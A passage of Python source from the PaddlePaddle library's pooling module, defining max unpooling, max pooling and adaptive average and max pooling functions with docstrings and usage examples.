unpool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type=op_type,
inputs={
"X": x,
"Indices": indices
},
outputs={"Out": unpool_out},
attrs={
"unpooling_type": "max",
"ksize": kernel_size,
"strides": stride,
"paddings": padding,
"output_size": output_size
})
return squeeze(unpool_out, [2])
def max_unpool2d(x,
indices,
kernel_size,
stride=None,
padding=0,
data_format="NCHW",
output_size=None,
name=None):
r"""
This API implements max unpooling 2d opereation.
See more details in :ref:`api_nn_pooling_MaxUnPool2D` .
Args:
x (Tensor): The input tensor of unpooling operator which is a 4-D tensor with
shape [N, C, H, W]. The format of input tensor is `"NCHW"`,
where `N` is batch size, `C` is the number of channels,
`H` is the height of the feature, and `W` is the width of the
feature. The data type if float32 or float64.
indices (Tensor): The indices given out by maxpooling2d which is a 4-D tensor with
shape [N, C, H, W]. The format of input tensor is `"NCHW"` ,
where `N` is batch size, `C` is the number of channels,
`H` is the height of the feature, and `W` is the width of the
feature. The data type if float32 or float64.
kernel_size (int|list|tuple): The unpool kernel size. If unpool kernel size is a tuple or list,
it must contain an integer.
stride (int|list|tuple): The unpool stride size. If unpool stride size is a tuple or list,
it must contain an integer.
padding (int | tuple): Padding that was added to the input.
output_size(list|tuple, optional): The target output size. If output_size is not specified,
the actual output shape will be automatically calculated by (input_shape,
kernel_size, padding).
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
- Input: :math:`(N, C, H_{in}, W_{in})`
- Output: :math:`(N, C, H_{out}, W_{out})`, where
.. math::
H_{out} = (H_{in} - 1) \times \text{stride[0]} - 2 \times \text{padding[0]} + \text{kernel\_size[0]}
.. math::
W_{out} = (W_{in} - 1) \times \text{stride[1]} - 2 \times \text{padding[1]} + \text{kernel\_size[1]}
or as given by :attr:`output_size` in the call operator
Returns:
Tensor: The output tensor of unpooling result.
Raises:
ValueError: If the input is not a 4-D tensor.
ValueError: If indeces shape is not equal input shape.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
data = paddle.rand(shape=[1,1,6,6])
pool_out, indices = F.max_pool2d(data, kernel_size=2, stride=2, padding=0, return_mask=True)
# pool_out shape: [1, 1, 3, 3], indices shape: [1, 1, 3, 3]
unpool_out = F.max_unpool2d(pool_out, indices, kernel_size=2, padding=0)
# unpool_out shape: [1, 1, 6, 6]
# specify a different output size than input size
unpool_out = F.max_unpool2d(pool_out, indices, kernel_size=2, padding=0, output_size=[7,7])
# unpool_out shape: [1, 1, 7, 7]
"""
kernel_size = utils.convert_to_list(kernel_size, 2, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 2, 'pool_stride')
padding = utils.convert_to_list(padding, 2, 'padding')
if data_format not in ["NCHW"]:
raise ValueError("Attr(data_format) should be 'NCHW'. Received "
"Attr(data_format): %s." % str(data_format))
output_size = _unpool_output_size(x, kernel_size, stride, padding,
output_size)
if in_dygraph_mode():
output = _C_ops.final_state_unpool(x, indices, kernel_size, stride,
padding, output_size, data_format)
elif in_dynamic_mode():
output = _C_ops.unpool(x, indices, 'unpooling_type', 'max', 'ksize',
kernel_size, 'strides', stride, 'paddings',
padding, "output_size", output_size,
"data_format", data_format)
return output
op_type = "unpool"
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype(input_param_name="x")
unpool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type=op_type,
inputs={
"X": x,
"Indices": indices
},
outputs={"Out": unpool_out},
attrs={
"unpooling_type": "max",
"ksize": kernel_size,
"strides": stride,
"paddings": padding,
"output_size": output_size
})
return unpool_out
def max_unpool3d(x,
indices,
kernel_size,
stride=None,
padding=0,
data_format="NCDHW",
output_size=None,
name=None):
r"""
This API implements max unpooling 3d opereation.
`max_unpool3d` accepts the output of `max_pool3d` as input,
including the indices of the maximum value and calculate the partial inverse.
All non-maximum values are set to zero.
- Input: :math:`(N, C, D_{in}, H_{in}, W_{in})`
- Output: :math:`(N, C, D_{out}, H_{out}, W_{out})`, where
.. math::
D_{out} = (D_{in} - 1) * stride[0] - 2 * padding[0] + kernel\_size[0]
.. math::
H_{out} = (H_{in} - 1) * stride[1] - 2 * padding[1] + kernel\_size[1]
.. math::
W_{out} = (W_{in} - 1) * stride[2] - 2 * padding[2] + kernel\_size[2]
or as given by :attr:`output_size` in the call operator
Args:
x (Tensor): The input tensor of unpooling operator which is a 5-D tensor with
shape [N, C, D, H, W]. The format of input tensor is `"NCDHW"`,
where `N` is batch size, `C` is the number of channels, `D` is
the depth of the feature, `H` is the height of the feature,
and `W` is the width of the feature. The data type is float32 or float64.
indices (Tensor): The indices given out by maxpooling3d which is a 5-D tensor with
shape [N, C, D, H, W]. The format of input tensor is `"NCDHW"` ,
where `N` is batch size, `C` is the number of channels, `D` is
the depth of the feature, `H` is the height of the feature,
and `W` is the width of the feature. The data type is float32 or float64.
kernel_size (int|list|tuple): The unpool kernel size. If unpool kernel size is a tuple or list,
it must contain an integer.
stride (int|list|tuple): The unpool stride size. If unpool stride size is a tuple or list,
it must contain an integer.
padding (int | tuple): Padding that was added to the input.
output_size(list|tuple, optional): The target output size. If output_size is not specified,
the actual output shape will be automatically calculated by (input_shape,
kernel_size, stride, padding).
data_format (string): The data format of the input and output data.
The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_depth, input_height, input_width]`.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of unpooling result.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
data = paddle.rand(shape=[1, 1, 4, 4, 6])
pool_out, indices = F.max_pool3d(data, kernel_size=2, stride=2, padding=0, return_mask=True)
# pool_out shape: [1, 1, 2, 2, 3], indices shape: [1, 1, 2, 2, 3]
unpool_out = F.max_unpool3d(pool_out, indices, kernel_size=2, padding=0)
# unpool_out shape: [1, 1, 4, 4, 6]
"""
kernel_size = utils.convert_to_list(kernel_size, 3, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 3, 'pool_stride')
padding = utils.convert_to_list(padding, 3, 'padding')
if data_format not in ["NCDHW"]:
raise ValueError("Attr(data_format) should be 'NCDHW'. Received "
"Attr(data_format): %s." % str(data_format))
output_size = _unpool_output_size(x, kernel_size, stride, padding,
output_size)
if in_dygraph_mode():
output = _C_ops.final_state_unpool3d(x, indices, kernel_size, stride,
padding, output_size, data_format)
elif in_dynamic_mode():
output = _C_ops.unpool3d(x, indices, 'unpooling_type', 'max', 'ksize',
kernel_size, 'strides', stride, 'paddings',
padding, "output_size", output_size,
"data_format", data_format)
return output
op_type = "unpool3d"
helper = LayerHelper(op_type, **locals())
dtype = helper.input_dtype(input_param_name="x")
unpool_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type=op_type,
inputs={
"X": x,
"Indices": indices
},
outputs={"Out": unpool_out},
attrs={
"unpooling_type": "max",
"ksize": kernel_size,
"strides": stride,
"paddings": padding,
"output_size": output_size
})
return unpool_out
def max_pool2d(x,
kernel_size,
stride=None,
padding=0,
return_mask=False,
ceil_mode=False,
data_format="NCHW",
name=None):
kernel_size = utils.convert_to_list(kernel_size, 2, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 2, 'pool_stride')
if data_format not in ["NCHW", "NHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCHW' or 'NHWC'. Received "
"Attr(data_format): %s." % str(data_format))
channel_last = True if data_format == "NHWC" else False
padding, padding_algorithm = _update_padding_nd(padding,
num_dims=2,
channel_last=channel_last,
ceil_mode=ceil_mode)
if data_format == "NHWC" and return_mask:
raise ValueError(
"When setting return_mask to true, data_format must be set to NCHW in API:max_pool2d"
)
if in_dygraph_mode():
if return_mask:
output = _C_ops.final_state_max_pool2d_with_index(
x, kernel_size, stride, padding, False, False)
return output if return_mask else output[0]
else:
return _C_ops.final_state_pool2d(x, kernel_size, stride, padding,
ceil_mode, True, data_format,
'max', False, False,
padding_algorithm)
if _in_legacy_dygraph():
if return_mask:
output = _C_ops.max_pool2d_with_index(
x, 'ksize', kernel_size, 'global_pooling', False, 'strides',
stride, 'paddings', padding, 'padding_algorithm',
padding_algorithm, 'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', True, 'data_format',
data_format)
return output if return_mask else output[0]
else:
output = _C_ops.pool2d(x, 'pooling_type', 'max', 'ksize',
kernel_size, 'global_pooling', False,
'padding_algorithm', padding_algorithm,
'strides', stride, 'paddings', padding,
'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', True,
'data_format', data_format)
return output
op_type = 'max_pool2d_with_index' if return_mask else "pool2d"
helper = LayerHelper(op_type, **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'max_pool2d')
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
mask = helper.create_variable_for_type_inference("int32")
outputs = {"Out": pool_out, "Mask": mask}
helper.append_op(type=op_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": 'max',
"ksize": kernel_size,
"global_pooling": False,
"strides": stride,
"paddings": padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": True,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": True,
"data_format": data_format,
})
return (pool_out, mask) if return_mask else pool_out
def max_pool3d(x,
kernel_size,
stride=None,
padding=0,
return_mask=False,
ceil_mode=False,
data_format="NCDHW",
name=None):
"""
This API implements max pooling 2d operation.
See more details in :ref:`api_nn_pooling_MaxPool3d` .
Args:
x (Tensor): The input tensor of pooling operator, which is a 5-D tensor with
shape [N, C, D, H, W]. The format of input tensor is `"NCDHW"` or `"NDHWC"`, where N represents batch size, C represents the number of channels, D, H and W represent the depth, height and width of the feature respectively.
kernel_size (int|list|tuple): The pool kernel size. If the kernel size
is a tuple or list, it must contain three integers,
(kernel_size_Depth, kernel_size_Height, kernel_size_Width).
Otherwise, the pool kernel size will be the cube of an int.
stride (int|list|tuple): The pool stride size. If pool stride size is a tuple or list,
it must contain three integers, [stride_Depth, stride_Height, stride_Width).
Otherwise, the pool stride size will be a cube of an int.
padding (string|int|list|tuple): The padding size. Padding could be in one of the following forms.
1. A string in ['valid', 'same'].
2. An int, which means the feature map is zero padded by size of `padding` on every sides.
3. A list[int] or tuple(int) whose length is 3, [pad_depth, pad_height, pad_weight] whose value means the padding size of each dimension.
4. A list[int] or tuple(int) whose length is 6. [pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right] whose value means the padding size of each side.
5. A list or tuple of pairs of integers. It has the form [[pad_before, pad_after], [pad_before, pad_after], ...]. Note that, the batch dimension and channel dimension should be [0,0] or (0,0).
The default value is 0.
ceil_mode (bool): ${ceil_mode_comment}
return_mask (bool): Whether to return the max indices along with the outputs. Default False. Only support "NDCHW" data_format.
data_format (string): The data format of the input and output data. An optional string from: `"NCDHW"`, `"NDHWC"`.
The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_depth, input_height, input_width]`.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of pooling result. The data type is same as input tensor.
Raises:
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is "VALID", but `ceil_mode` is True.
ShapeError: If the output's shape calculated is not greater than 0.
Examples:
.. code-block:: python
import paddle
import paddle.nn.functional as F
# max pool3d
x = paddle.uniform([1, 3, 32, 32, 32])
output = F.max_pool3d(x,
kernel_size=2,
stride=2, padding=0)
# output.shape [1, 3, 16, 16, 16]
# for return_mask=True
x = paddle.uniform([1, 3, 32, 32, 32])
output, max_indices = paddle.nn.functional.max_pool3d(x,
kernel_size = 2,
stride = 2,
padding=0,
return_mask=True)
# output.shape [1, 3, 16, 16, 16], max_indices.shape [1, 3, 16, 16, 16]
"""
kernel_size = utils.convert_to_list(kernel_size, 3, 'pool_size')
if stride is None:
stride = kernel_size
else:
stride = utils.convert_to_list(stride, 3, 'pool_stride')
channel_last = _channel_last(data_format, 3)
padding, padding_algorithm = _update_padding_nd(padding,
3,
channel_last=channel_last,
ceil_mode=ceil_mode)
if data_format == "NDHWC" and return_mask:
raise ValueError(
"When setting return_mask to true, data_format must be set to NCDHW in API:max_pool3d"
)
if in_dygraph_mode():
if return_mask:
output = _C_ops.final_state_max_pool3d_with_index(
x, kernel_size, stride, padding, False, False)
return output if return_mask else output[0]
else:
return _C_ops.final_state_pool3d(x, kernel_size, stride, padding,
ceil_mode, True, data_format,
'max', False, False,
padding_algorithm)
if _in_legacy_dygraph():
if return_mask:
output = _C_ops.max_pool3d_with_index(
x, 'pooling_type', 'max', 'ksize', kernel_size, 'strides',
stride, 'paddings', padding, 'global_pooling', False,
'padding_algorithm', padding_algorithm, 'use_cudnn', True,
'ceil_mode', ceil_mode, 'use_mkldnn', False, 'exclusive', True,
'data_format', data_format)
return output if return_mask else output[0]
else:
output = _C_ops.pool3d(x, 'pooling_type', 'max', 'ksize',
kernel_size, 'global_pooling', False,
'padding_algorithm', padding_algorithm,
'strides', stride, 'paddings', padding,
'use_cudnn', True, 'ceil_mode', ceil_mode,
'use_mkldnn', False, 'exclusive', True,
'data_format', data_format)
return output
op_type = "max_pool3d_with_index" if return_mask else "pool3d"
helper = LayerHelper(op_type, **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'max_pool3d')
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
mask = helper.create_variable_for_type_inference('int32')
outputs = {"Out": pool_out, "Mask": mask}
helper.append_op(type=op_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": 'max',
"ksize": kernel_size,
"global_pooling": False,
"strides": stride,
"paddings": padding,
"padding_algorithm": padding_algorithm,
"use_cudnn": True,
"ceil_mode": ceil_mode,
"use_mkldnn": False,
"exclusive": False,
"data_format": data_format,
})
return (pool_out, mask) if return_mask else pool_out
def adaptive_avg_pool1d(x, output_size, name=None):
"""
Adaptive average pooling 1d operation on :attr:`x` according to :attr:`output_size`.
Notes:
See more details in :ref:`api_nn_pooling_AdaptiveAvgPool1d` .
Args:
x (Tensor): The input Tensor of pooling, which is a 3-D tensor with shape :math:`[N, C, L]`, where :math:`N` is batch size, :math:`C` is the number of channels and :math:`L` is the length of the feature. The data type is float32 or float64.
output_size (int): The target output size. Its data type must be int.
name (str, optional): For details, please refer to :ref:`api_guide_Name`. Generally, no setting is required. Default: None.
Returns:
Tensor: The result of 1D adaptive average pooling. Its data type is same as input.
Examples:
.. code-block:: python
# average adaptive pool1d
# suppose input data in shape of [N, C, L], `output_size` is m or [m],
# output shape is [N, C, m], adaptive pool divide L dimension
# of input data into m grids averagely and performs poolings in each
# grid to get output.
# adaptive max pool performs calculations as follow:
#
# for i in range(m):
# lstart = floor(i * L / m)
# lend = ceil((i + 1) * L / m)
# output[:, :, i] = sum(input[:, :, lstart: lend])/(lstart - lend)
#
import paddle
import paddle.nn.functional as F
data = paddle.uniform([1, 3, 32])
pool_out = F.adaptive_avg_pool1d(data, output_size=16)
# pool_out shape: [1, 3, 16])
"""
pool_type = 'avg'
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'adaptive_pool2d')
check_type(output_size, 'pool_size', (int), 'adaptive_pool1d')
_check_input(x, 3)
pool_size = [1] + utils.convert_to_list(output_size, 1, 'pool_size')
x = unsqueeze(x, [2])
if in_dynamic_mode():
pool_out = _C_ops.pool2d(x, 'pooling_type', pool_type, 'ksize',
pool_size, 'adaptive', True)
return squeeze(pool_out, [2])
l_type = "pool2d"
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
outputs = {"Out": pool_out}
helper.append_op(type=l_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": pool_type,
"ksize": pool_size,
"adaptive": True,
})
return squeeze(pool_out, [2])
def adaptive_avg_pool2d(x, output_size, data_format='NCHW', name=None):
"""
This API implements adaptive average pooling 2d operation.
See more details in :ref:`api_nn_pooling_AdaptiveAvgPool2d` .
Args:
x (Tensor): The input tensor of adaptive avg pool2d operator, which is a 4-D tensor.
The data type can be float32 or float64.
output_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
it must contain two element, (H, W). H and W can be either a int, or None which means
the size will be the same as that of the input.
data_format (str): The data format of the input and output data. An optional string
from: "NCHW", "NHWC". The default is "NCHW". When it is "NCHW", the data is stored in
the order of: [batch_size, input_channels, input_height, input_width].
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of avg adaptive pool2d result. The data type is same as input tensor.
Raises:
ValueError: If `data_format` is not "NCHW" or "NHWC".
Examples:
.. code-block:: python
# adaptive avg pool2d
# suppose input data in shape of [N, C, H, W], `output_size` is [m, n],
# output shape is [N, C, m, n], adaptive pool divide H and W dimensions
# of input data into m * n grids averagely and performs poolings in each
# grid to get output.
# adaptive avg pool performs calculations as follow:
#
# for i in range(m):
# for j in range(n):
# hstart = floor(i * H / m)
# hend = ceil((i + 1) * H / m)
# wstart = floor(i * W / n)
# wend = ceil((i + 1) * W / n)
# output[:, :, i, j] = avg(input[:, :, hstart: hend, wstart: wend])
#
import paddle
import numpy as np
input_data = np.random.rand(2, 3, 32, 32)
x = paddle.to_tensor(input_data)
# x.shape is [2, 3, 32, 32]
out = paddle.nn.functional.adaptive_avg_pool2d(
x = x,
output_size=[3, 3])
# out.shape is [2, 3, 3, 3]
"""
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'adaptive_avg_pool2d')
check_type(data_format, 'data_format', str, 'adaptive_avg_pool2d')
if data_format not in ["NCHW", "NHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCHW' or 'NHWC'. Received "
"Attr(data_format): %s." % str(data_format))
if data_format == "NCHW":
in_h, in_w = x.shape[2:4]
else:
in_h, in_w = x.shape[1:3]
if isinstance(output_size, int):
output_size = utils.convert_to_list(output_size, 2, 'output_size')
else:
output_size = list(output_size)
if output_size[0] == None:
output_size[0] = in_h
if output_size[1] == None:
output_size[1] = in_w
if in_dygraph_mode():
return _C_ops.final_state_pool2d_gpudnn_unused(x, output_size, [1, 1],
[0, 0], False, True,
data_format, 'avg',
False, True, "EXPLICIT")
if _in_legacy_dygraph():
return _C_ops.pool2d(x, 'pooling_type', 'avg', 'ksize', output_size,
'global_pooling', False, 'adaptive', True,
'data_format', data_format)
l_type = 'pool2d'
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
outputs = {"Out": pool_out}
helper.append_op(type=l_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": "avg",
"ksize": output_size,
"adaptive": True,
"data_format": data_format,
})
return pool_out
def adaptive_avg_pool3d(x, output_size, data_format='NCDHW', name=None):
"""
This API implements adaptive average pooling 3d operation.
See more details in :ref:`api_nn_pooling_AdaptiveAvgPool3d` .
Args:
x (Tensor): The input tensor of adaptive avg pool3d operator, which is a 5-D tensor.
The data type can be float32, float64.
output_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list,
it must contain three elements, (D, H, W). D, H and W can be either a int, or None which means
the size will be the same as that of the input.
data_format (str): The data format of the input and output data. An optional string
from: "NCDHW", "NDHWC". The default is "NCDHW". When it is "NCDHW", the data is stored in
the order of: [batch_size, input_channels, input_depth, input_height, input_width].
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of avg adaptive pool3d result. The data type is same as input tensor.
Raises:
ValueError: If `data_format` is not "NCDHW" or "NDHWC".
Examples:
.. code-block:: python
# adaptive avg pool3d
# suppose input data in shape of [N, C, D, H, W], `output_size` is [l, m, n],
# output shape is [N, C, l, m, n], adaptive pool divide D, H and W dimensions
# of input data into l * m * n grids averagely and performs poolings in each
# grid to get output.
# adaptive avg pool performs calculations as follow:
#
# for i in range(l):
# for j in range(m):
# for k in range(n):
# dstart = floor(i * D / l)
# dend = ceil((i + 1) * D / l)
# hstart = floor(j * H / m)
# hend = ceil((j + 1) * H / m)
# wstart = floor(k * W / n)
# wend = ceil((k + 1) * W / n)
# output[:, :, i, j, k] =
# avg(input[:, :, dstart:dend, hstart: hend, wstart: wend])
import paddle
import numpy as np
input_data = np.random.rand(2, 3, 8, 32, 32)
x = paddle.to_tensor(input_data)
# x.shape is [2, 3, 8, 32, 32]
out = paddle.nn.functional.adaptive_avg_pool3d(
x = x,
output_size=[3, 3, 3])
# out.shape is [2, 3, 3, 3, 3]
"""
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float32', 'float64'],
'adaptive_avg_pool3d')
check_type(data_format, 'data_format', str, 'adaptive_avg_pool3d')
if data_format not in ["NCDHW", "NDHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCDHW' or 'NDHWC'. Received "
"Attr(data_format): %s." % str(data_format))
if data_format == "NCDHW":
in_l, in_h, in_w = x.shape[2:5]
else:
in_l, in_h, in_w = x.shape[1:4]
if isinstance(output_size, int):
output_size = utils.convert_to_list(output_size, 3, 'output_size')
else:
output_size = list(output_size)
if output_size[0] == None:
output_size[0] = in_l
if output_size[1] == None:
output_size[1] = in_h
if output_size[2] == None:
output_size[2] = in_w
if in_dynamic_mode():
return _C_ops.pool3d(x, 'pooling_type', 'avg', 'ksize', output_size,
'global_pooling', False, 'adaptive', True,
'data_format', data_format)
l_type = 'pool3d'
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
outputs = {"Out": pool_out}
helper.append_op(type=l_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": "avg",
"ksize": output_size,
"adaptive": True,
"data_format": data_format,
})
return pool_out
def adaptive_max_pool1d(x, output_size, return_mask=False, name=None):
"""
This API implements adaptive max pooling 1d operation.
See more details in :ref:`api_nn_pooling_AdaptiveMaxPool1d` .
Args:
x (Tensor): The input tensor of pooling operator, which is a 3-D tensor
with shape [N, C, L]. The format of input tensor is NCL,
where N is batch size, C is the number of channels, L is the
length of the feature. The data type is float32 or float64.
output_size (int): The pool kernel size. The value should be an integer.
return_mask (bool): If true, the index of max pooling point will be returned along
with outputs. It cannot be set in average pooling type. Default False.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Tensor: The output tensor of adaptive pooling result. The data type is same
as input tensor.
Raises:
ValueError: 'output_size' should be an integer.
Examples:
.. code-block:: python
# max adaptive pool1d
# suppose input data in shape of [N, C, L], `output_size` is m or [m],
# output shape is [N, C, m], adaptive pool divide L dimension
# of input data into m grids averagely and performs poolings in each
# grid to get output.
# adaptive max pool performs calculations as follow:
#
# for i in range(m):
# lstart = floor(i * L / m)
# lend = ceil((i + 1) * L / m)
# output[:, :, i] = max(input[:, :, lstart: lend])
#
import paddle
import paddle.nn.functional as F
import numpy as np
data = paddle.to_tensor(np.random.uniform(-1, 1, [1, 3, 32]).astype(np.float32))
pool_out = F.adaptive_max_pool1d(data, output_size=16)
# pool_out shape: [1, 3, 16])
pool_out, indices = F.adaptive_max_pool1d(data, output_size=16, return_mask=True)
# pool_out shape: [1, 3, 16] indices shape: [1, 3, 16]
"""
pool_type = 'max'
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float32', 'float64'],
'adaptive_max_pool1d')
check_type(output_size, 'pool_size', int, 'adaptive_max_pool1d')
check_type(return_mask, 'return_mask', bool, 'adaptive_max_pool1d')
_check_input(x, 3)
pool_size = [1] + utils.convert_to_list(output_size, 1, 'pool_size')
x = unsqueeze(x, [2])
if in_dynamic_mode():
pool_out = _C_ops.max_pool2d_with_index(x, 'pooling_type', pool_type,
'ksize', pool_size, 'adaptive',
True)
return (squeeze(pool_out[0], [2]), squeeze(
pool_out[1], [2])) if return_mask else squeeze(pool_out[0], [2])
l_type = 'max_pool2d_with_index'
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
mask = helper.create_variable_for_type_inference('int32')
outputs = {"Out": pool_out, "Mask": mask}
helper.append_op(type=l_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": pool_type,
"ksize": pool_size,
"adaptive": True,
})
return (squeeze(pool_out, [2]),
squeeze(mask, [2])) if return_mask else squeeze(pool_out, [2])
def adaptive_max_pool2d(x, output_size, return_mask=False, name=None):
"""
This operation applies a 2D adaptive max pooling on input tensor.
See more details in :ref:`api_nn_pooling_AdaptiveMaxPool2d` .
Args:
x (Tensor): The input tensor of adaptive max pool2d operator, which is a 4-D tensor. The data type can be float16, float32, float64, int32 or int64.
output_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list, it must contain two elements, (H, W). H and W can be either a int, or None which means the size will be the same as that of the input.
return_mask (bool): If true, the index of max pooling point will be returned along with outputs. Default False.
name(str, optional): For detailed information, please refer to :ref:`api_guide_Name`. Usually name is no need to set and None by default.
Returns:
Tensor: The output tensor of adaptive max pool2d result. The data type is same as input tensor.
Examples:
.. code-block:: python
# max adaptive pool2d
# suppose input data in the shape of [N, C, H, W], `output_size` is [m, n]
# output shape is [N, C, m, n], adaptive pool divide H and W dimensions
# of input data into m*n grids averagely and performs poolings in each
# grid to get output.
# adaptive max pool performs calculations as follow:
#
# for i in range(m):
# for j in range(n):
# hstart = floor(i * H / m)
# hend = ceil((i + 1) * H / m)
# wstart = floor(i * W / n)
# wend = ceil((i + 1) * W / n)
# output[:, :, i, j] = max(input[:, :, hstart: hend, wstart: wend])
#
import paddle
import numpy as np
input_data = np.random.rand(2, 3, 32, 32)
x = paddle.to_tensor(input_data)
# x.shape is [2, 3, 32, 32]
out = paddle.nn.functional.adaptive_max_pool2d(
x = x,
output_size=[3, 3])
# out.shape is [2, 3, 3, 3]
"""
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float32', 'float64'],
'adaptive_max_pool2d')
check_type(return_mask, 'return_mask', bool, 'adaptive_max_pool2d')
#check_type(output_size, 'pool_size', (int), 'adaptive_max_pool2d')
_check_input(x, 4)
in_h, in_w = x.shape[2:4]
if isinstance(output_size, int):
output_size = utils.convert_to_list(output_size, 2, 'output_size')
else:
output_size = list(output_size)
if output_size[0] == None:
output_size[0] = in_h
if output_size[1] == None:
output_size[1] = in_w
if in_dynamic_mode():
pool_out = _C_ops.max_pool2d_with_index(x, 'pooling_type', 'max',
'ksize', output_size,
'adaptive', True)
return pool_out if return_mask else pool_out[0]
l_type = 'max_pool2d_with_index'
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
mask = helper.create_variable_for_type_inference('int32')
outputs = {"Out": pool_out, "Mask": mask}
helper.append_op(type=l_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": 'max',
"ksize": output_size,
"adaptive": True,
})
#return (pool_out, mask) if return_mask else pool_out
return pool_out
def adaptive_max_pool3d(x, output_size, return_mask=False, name=None):
"""
This operation applies a 3D adaptive max pooling on input tensor.
See more details in :ref:`api_nn_pooling_AdaptiveMaxPool3d` .
Args:
x (Tensor): The input tensor of adaptive max pool3d operator, which is a 5-D tensor. The data type can be float32, float64.
output_size (int|list|tuple): The pool kernel size. If pool kernel size is a tuple or list, it must contain three elements, (D, H, W). D, H and W can be either a int, or None which means the size will be the same as that of the input.
return_mask (bool): If true, the index of max pooling point will be returned along with outputs. Default False.
name(str, optional): For detailed information, please refer to :ref:`api_guide_Name`. Usually name is no need to set and None by default.
Returns:
Tensor: The output tensor of adaptive max pool3d result. The data type is same as input tensor.
Examples:
.. code-block:: python
# adaptive max pool3d
# suppose input data in the shape of [N, C, D, H, W], `output_size` is [l, m, n]
# output shape is [N, C, l, m, n], adaptive pool divide D, H and W dimensions
# of input data into m*n grids averagely and performs poolings in each
# grid to get output.
# adaptive max pool performs calculations as follow:
#
# for i in range(l):
# for j in range(m):
# for k in range(n):
# dstart = floor(i * D / l)
# dend = ceil((i + 1) * D / l)
# hstart = floor(i * H / m)
# hend = ceil((i + 1) * H / m)
# wstart = floor(i * W / n)
# wend = ceil((i + 1) * W / n)
# output[:, :, i, j, k] = max(input[:, :, dstart: dend, hstart: hend, wstart: wend])
#
import paddle
import numpy as np
input_data = np.random.rand(2, 3, 8, 32, 32)
x = paddle.to_tensor(input_data)
# x.shape is [2, 3, 8, 32, 32]
out = paddle.nn.functional.adaptive_max_pool3d(
x = x,
output_size=[3, 3, 3])
# out.shape is [2, 3, 3, 3, 3]
"""
if not in_dynamic_mode():
check_variable_and_dtype(x, 'x', ['float32', 'float64'],
'adaptive_max_pool3d')
check_type(return_mask, 'return_mask', bool, 'adaptive_max_pool3d')
#check_type(output_size, 'pool_size', (int), 'adaptive_max_pool3d')
_check_input(x, 5)
in_l, in_h, in_w = x.shape[2:5]
if isinstance(output_size, int):
output_size = utils.convert_to_list(output_size, 3, 'output_size')
else:
output_size = list(output_size)
if output_size[0] == None:
output_size[0] = in_l
if output_size[1] == None:
output_size[1] = in_h
if output_size[2] == None:
output_size[2] = in_w
if in_dynamic_mode():
pool_out = _C_ops.max_pool3d_with_index(x, 'pooling_type', 'max',
'ksize', output_size,
'adaptive', True)
return pool_out if return_mask else pool_out[0]
l_type = 'max_pool3d_with_index'
helper = LayerHelper(l_type, **locals())
